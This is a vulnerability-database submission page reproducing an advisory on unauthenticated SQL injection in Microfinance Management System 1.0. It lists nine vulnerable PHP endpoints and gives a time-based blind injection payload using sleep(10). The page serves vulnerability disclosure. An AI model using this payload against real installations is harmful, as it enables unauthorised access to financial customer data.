| 제목 | Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated) |
|---|
| 설명 | # Exploit Title: Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated)
# Date: 23/03/2022
# Exploit Author: Mr Empy
# Software Link: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Version: 1.0
# Tested on: Linux
Title:
================
Microfinance Management System 1.0 - Multiple SQL Injection (unauthenticated)
Summary:
================
Microfinance Management System version 1.0 is affected by a vulnerability that allows an attacker to query the database. Due to the lack of SQL sanitization and the lack of session verification to see if an administrative user is accessing the application, the attacker is able to gain access to the database.
Severity Level:
================
7.3 (High)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
Affected Product:
================
Microfinance Management System v1.0
Steps to Reproduce:
================
All these endpoints are vulnerable to SQL injection:
/mims/pdf_singlecustomer_type.php?customer_type_number=1
/mims/updateaccount.php?account_number=1
/mims/updatecustomer.php?customer_number=1
/mims/update_customertype.php?customer_type_number=1
/mims/updateaccount_type.php?account_type_number=1
/mims/pdf_singleaccount_status.php?account_status_number=1
/mims/pdfaccount.php?account_number=1
/mims/pdf_singleaccount_type.php?account_type_number=1
/mims/pdf_singlecustomer.php?customer_number=1
Payload used:
' and (select * from(select(sleep(10)))Avx) and 'abc' = 'abc |
|---|
| 원천 | ⚠️ https://www.sourcecodester.com/php/14822/microfinance-management-system.html? |
|---|
| 사용자 | mrempy (UID 24379) |
|---|
| 제출 | 2022. 03. 23. PM 03:55 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 03. 24. AM 01:25 (10 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 195642 [Microfinance Management System SQL 주입] |
|---|
| 포인트들 | 20 |
|---|